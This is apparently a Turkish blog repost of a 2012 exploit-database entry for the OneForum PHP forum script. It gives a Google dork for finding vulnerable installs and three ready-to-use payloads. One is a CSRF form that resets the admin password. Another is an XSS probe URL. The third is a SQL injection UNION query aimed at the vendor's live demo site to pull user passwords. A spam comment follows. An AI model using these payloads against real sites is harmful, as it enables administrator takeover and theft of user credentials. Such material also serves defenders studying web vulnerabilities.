OneForum Multiple Vulnerabilities

OneForum scriptinde sql injection ve XSS açıkları bulundu. Açığa ilişkin açıklamalar şu şekilde;

########################################## 
# Exploit Title: OneForum Multiple Vulnerabilities 
# Date: 2012-10-29 
# Author: DaOne aka Mocking Bird 
# Home: 1337day Inj3ct0r Exploit Database  
# Software Link: http://www.onescripts.de/download/oneforum_en.zip 
# Category: webapps/php 
# Version: 2.0->3.0 
# Google dork: intext:"powered by OneScripts" 
########################################## 
 
[#] CSRF Change Admin Password: 
<html> 
<body> 
<form method="post" action="http://site/password.php?user_id=1" > 
<input name="password" type="text" value="passw0rd"> 
<input type="submit" name="submit" value="change password" > 
</form> 
</body> 
</html> 
 
[#] XSS 
http://localhost/category.php?id=<script>alert(0)</script> 
 
[#] SQL Injection: 
http://localhost/category.php?id=SQL 
Demo-> http://www.onescripts.de/demo/OneForum_en/category.php?id=2 UNION SELECT 1,user_pass,3 from users-- 
 
http://localhost/OneForum/topic.php?id= 

One comment

  1. Liberal Cabrera Raya dedi ki:

    This is very intriguing, You are a quite skilled blogger. I have joined your rss feed and look forward to looking for far more of your wonderful post. Also, I’ve shared your internet web site in my social networks!

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir